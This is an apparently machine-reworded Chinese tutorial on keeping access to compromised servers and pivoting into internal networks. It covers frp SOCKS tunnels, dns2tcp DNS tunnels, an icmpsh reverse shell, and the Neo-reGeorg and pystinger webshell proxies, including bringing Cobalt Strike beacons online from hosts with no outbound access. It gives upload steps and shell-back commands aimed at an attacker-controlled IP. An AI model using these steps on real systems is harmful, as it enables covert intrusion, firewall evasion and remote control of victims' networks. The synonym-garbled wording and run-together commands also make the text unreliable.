出网情形
拿到做事器权限之后,遇见这种机器,十分大略,针对不同情形搭建不同隧道,为了速率可以建立sockets隧道、为了暗藏可以利用dns隧道、icmp隧道等,本文大略先容几个常用工具。
frp

frp 是一个专注于内网穿透的高性能的反向代理运用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网做事以安全、便捷的办法通过具有公网 IP 节点的中转暴露到公网。
项目地址:https://github.com/fatedier/frp/
下载之后,我们只须要关注四个文件即可:
frps
frps.ini
frpc
frpc.ini
修正frpc.ini,这里搭建sockets隧道,上传至目标做事器启动即可。
./frpc-cfrpc.ini
做事端根据frps.ini修正端口
启动监听
./frps-cfrps.ini
即可建立sockets隧道,利用Proxifierprox等,即可全局代理隧道,访问目标主机内网。
dns
这个比较麻烦须要准备一个域名,和一台DNS做事器,在域名解析添加一条NS记录和一条A记录。举个例子,域名是123.com,添加一个子域名a.123.com,且类型为NS,并将NS记录指向b.123.com,然后将b.123.com建立A记录做事器IP即可,利用的工具大概多,本文大略先容dns2tcp。
a.123.comNSb.123.comb.123.comA1.1.1.1
项目地址:https://github.com/HEYAHONG/dns2tcp
客户端
dns2tcpc-rnc-za.123.com1.1.1.1-l8888-d2-r后接手事名称任意换,本文用nc-z后接NS记录的网址-l后接本地端口
做事端
修正dns2tcpd.conf,
listen=0.0.0.0port=53user=rootchroot=/home/domain=a.123.comkey=123resources=ssh:127.0.0.1:22,smtp:127.0.0.1:25,socks:127.0.0.1:1080,http:127.0.0.1:80,https:127.0.0.1:8080
然后实行,dns隧道就搭建好了,利用nc进行传输文件即可。
dns2tcpd-F-d3-f/home/dns2tcpd.conf
建立传输
目标主机监听并接管文件即可。
icmp
icmp隧道紧张由于大部分防火墙不会屏蔽 ping ,以是可以将流量封装在icmp进行传输,这种速率跟sockets比较太慢了,分外情形才会利用。
项目地址:https://github.com/inquisb/icmpsh
做事端:
python icmpsh_m.py ip 目标ip
目标机
icmpsh.exe-t目标ip
即可反弹icmp隧道shell回来。
不出网情形
拿到做事器权限之后,遇见这种机器,只能利用基于webshell的代理,只须要将webshell上传到目标主机即可,然后建立tcp连接,紧张利用session来识别不同的的tcp连接,我们攻击监听tcp,将数据post提交到webshell即可进行传输,本文大略先容两个常用的。
Neo-reGeorg
Neo-reGeorg相称于是 reGeorg的升级版,有了更强的暗藏性,事理都是相同的,常用于webshell代理流量,进而进行内网渗透。
项目地址:https://github.com/L-codes/Neo-reGeorg
首先须要设置密码,天生各种类型webshell,并上传至目标做事器
pythonneoreg.pygenerate-kpassword
上传至做事器即可,然后启动监听即可
pythonneoreg.py-kpassword-uhttp://1.1.1.1/tunnel.php
末了挂上sockets代理即可访问内网。
pystinger
毒刺(pystinger)通过webshell实现内网socks4代理,并且可以利用pystinge实现各种cs\msf上线,目前仅支持php、jsp(x)、aspx.
项目地址:https://github.com/FunnyWolf/pystinger
这个工具比较强大,这里可以直接上线cs,大略先容如何搭建socks4以及cs上线。
socks4隧道搭建:
首先上传proxy.php,然后上传stinger_server.exe 到目标做事器,并start命令运行该程序
末了在我们的做事器实行
./stinger_client-whttp://1.1.1.1/proxy.php-l0.0.0.0-p60000
即可建立socks4隧道,利用Proxifierprox等,访问目标主机内网。
cs上线:
前面大体相同,首先上传proxy.php,然后上传stinger_server.exe 到目标做事器,启动利用冰蝎start启动即可
我们的做事器也须要进行监听
./stinger_client-whttp://1.1.1.1/proxy.php-l0.0.00-p60000
然后cs进行监听,端口填写60020
进而利用cs天生powershell
实行可以利用pystinger,进行不出网主机上线。
End
这里只是抛砖引玉,引出一些在之前事情中针对付不出网以及出网主机,用过最多的几个隧道代理工具,还请各位大佬勿喷,有更好的工具多补充,共同互换,这样我们才能共同发展,格拉德威尔曾说过:“人们眼中的天才之以是卓越非凡,并非资质超人一等,而是付出了持续不断的努力。1万小时的熬炼是任何人从平凡变成天下级大师的必要条件“。